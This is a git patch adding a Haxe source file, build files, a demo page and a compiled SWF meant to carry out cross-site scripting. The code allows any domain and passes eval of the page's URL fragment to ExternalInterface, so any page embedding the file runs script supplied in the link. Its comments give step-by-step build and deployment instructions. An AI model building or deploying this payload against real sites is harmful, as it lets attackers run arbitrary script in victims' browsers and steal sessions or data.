From e6646686597d58c5a95998c93baae54d72029491 Mon Sep 17 00:00:00 2001 From: Jann Horn Date: Wed, 16 Apr 2014 17:44:50 +0200 Subject: [PATCH 1/1] i --- Xss.hx | 47 +++++++++++++++++++++++++++++++++++++++++++++++ compile.hxml | 3 +++ demo.html | 2 ++ xss.swf | Bin 0 -> 2669 bytes 4 files changed, 52 insertions(+) create mode 100644 Xss.hx create mode 100644 compile.hxml create mode 100644 demo.html create mode 100644 xss.swf diff --git a/Xss.hx b/Xss.hx new file mode 100644 index 0000000..c59933a --- /dev/null +++ b/Xss.hx @@ -0,0 +1,47 @@ +// xss.hx +// +// Purpose: +// This haxe source file builds a SWF which injects JavaScript into the including page. +// +// To build: +// 1. Acquire the latest stable version of haxe from http://haxe.org/download +// Note: To run haxe, you may also need Neko (http://nekovm.org/download) +// 2. Create a file called xss.hx with these contents. +// 3. Create a file called compile.hxml with the following content: +// -swf-version 9 +// -swf xss.swf +// -main xss +// 4. From the command line, execute: +// haxe compile.hxml +// +// To activate: +// 1. Take xss.swf generated by haxe and deploy it to your webserver. +// 2. Embed it into your HTML file with code like the following: +// +// + +import flash.external.ExternalInterface; + +class Xss { + + public static function main() { + flash.system.Security.allowDomain("*"); + ExternalInterface.call( [ "(function(){setTimeout(\"", + "eval(document.location.hash.slice(1))", + "\",0);})" ].join('') ); + } + +} diff --git a/compile.hxml b/compile.hxml new file mode 100644 index 0000000..081a044 --- /dev/null +++ b/compile.hxml @@ -0,0 +1,3 @@ +-swf-version 9 +-swf xss.swf +-main Xss diff --git a/demo.html b/demo.html new file mode 100644 index 0000000..787b23c --- /dev/null +++ b/demo.html @@ -0,0 +1,2 @@ + diff --git a/xss.swf b/xss.swf new file mode 100644 index 0000000000000000000000000000000000000000..5564f3576de2cb686976a739cbb63048ec02f276 GIT binary patch literal 2669 zcmV-z3X=6hS5pa!4*&po+J#o#ZyU!E-?^_neuyF|O0+G@rfo{3oU=qbiIdn#ELjpo zDYj@w@<-xGybs>#E+Kge?HJPZt2;*2s%f4*|LYBl%qyj$0tMy#h} ze&L(VhE_`~^ogYg?v`elC-PRSVfc>Q$WK1;On=R(n{La`pC323wOYRF8m+q7@TY37 zp)su~J26eh2KHF?hV{jF=$(^}Ql%_+mJPtUHtK7FN7xH_%3oSN@6 zgil?kA+7pNr?Dv*7^1-9;~#onxEG_3L59|FDLQ7Y%K4T!+iYq(V$Erop19C#y3G(O z`T<36x^B(X8gcJ4XRBhk4bN}34Bu@^TUt}Ad%Ul0ih*ANHT`I%;sqyHnx-LawLDv@ znT<`~hCC=R88aKLdc}A9N~rCiL#<($uEiW80FkCycel+s+o@FtDis3{Z&v&!A}DVn zYK#c64CdS#MrUElX44Z|PQy>&*{0vq#YpjUILOj%)-|8M<>(X($Br22;ZSwFt(vwI zy6tW|=3LF$8ej(;S%?)+Yj}d?qUWkSaH_s7 zK4xp;2Gx;+m}WxoF*OdFDccIjYK9wHo9t##cS)D_<7aa3M#;AhIK!(rYIbTT^g5H2fur43=Z}{Cq>itlwfzV)RRe?o}^=dV? zny!z~R4O9+-)zWh+ft~sn|FPhP$;RF#ruy z!u~@u>R=vUlr5=ePI2~D5K|r-hS!=+p}`nzG1krYyAN8T8@JEC(SRVi>3cnSjLBnmR+!&Dfg z5T}r!kfbm~#bF8~6w(w<@SDOeOXX~?GFQ23NWjY6G5gMv$8 zi^As=niM<=EehKdzM!x};Y$inDExp5Us3oW1zdkbp$!y%jK5v{{RDqM#ox~$M*v@e z|NrCI4goE5gm6iu`mzg1Mv-Gmgp-Mkq%8L>N$`O&$$-YcWKRsS;^D%P`QAbgw* z5g|!N6A(R};0Den_*ga}3}zBy{QZQKIFX>q*@QfFmW(ri@4((vCgP z67NOusU0(f_$VPEUD&rqcG2QHzN@Bn5l=qB;mIdqUl*)X-ta#T4gv>C_M5icRmOwB zkW?mcDG@Tji6Cb83J)&6DB#ILSLIV!z==|)`-f7T60%p=FQ7bEf^Zs7Bryyf@@m=| z$h4y=tllD{tueNi&w!dnu|2@Hm_3L|4RV-wN=+9tq#bQXpLaXppT}=;9>4tp zGEc{!s}okPoqu-dca0D=y&heT66VVqC{B|0czgVLS9#06$OK*cHMZq!g>4<{Ql>q{ z(7FV1kzsbpnzjqmNE z{z-5GJws-lXwVMY#v`l)sUFhhGuUxgLUQ6i2M0RE?~<~LhT(~A<{6E23B&Y^XuQTu zqKgXaVUnhI^_g>mRI3i2&U*ktnNv9sO)`+EeEcU~a^3h=u9hTGa zOx}4Vlm8tg4rP$$%gBzx`U{2?Rz7BP7{7?e{;CIcKe$IJ1VQ&2KDN3+-Zgk&9o(i-MU>XUWi^ zoAlVj_+JMHT|Dcwi1yRpx5p_7b&njpH2ZhYY>X3tJA(PXg7r?OoljxIsS|s4?yz+(9KE?|d>9_`W43|P@x!>XFJI@0 b26rHpE8l=s#96gWP`sxG&4Y1V$cl literal 0 HcmV?d00001 -- 2.20.1